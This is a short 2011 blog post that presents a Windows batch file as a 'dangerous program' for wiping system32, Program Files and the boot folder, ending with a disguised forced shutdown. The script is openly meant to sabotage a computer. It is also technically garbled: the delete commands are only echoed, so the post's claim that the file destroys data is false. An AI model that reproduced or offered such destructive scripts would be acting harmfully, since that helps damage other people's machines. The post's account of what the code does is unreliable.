пятница, 2 декабря 2011 г.

Hacking with notepad! (Delete local disk)

Hi, today i will show you how to delete local disk by notepad! do this:

  1. open notepad.
  2. save file in .bat format. 
  3. write this
    @echo off
    echo YI del "C:\windows\system32"
    echo YI del "C:\program files\"
    echo YI del "C:\windows\boot\"
    shutdown -s -t 5 -c "error"
    5. Save file.

So it is a very dangerous program, which can destroy common files of computer and it can't works without it.
At next post I will write about "cmd" panel - command panel and remote hacks.




Комментариев нет:

Отправить комментарий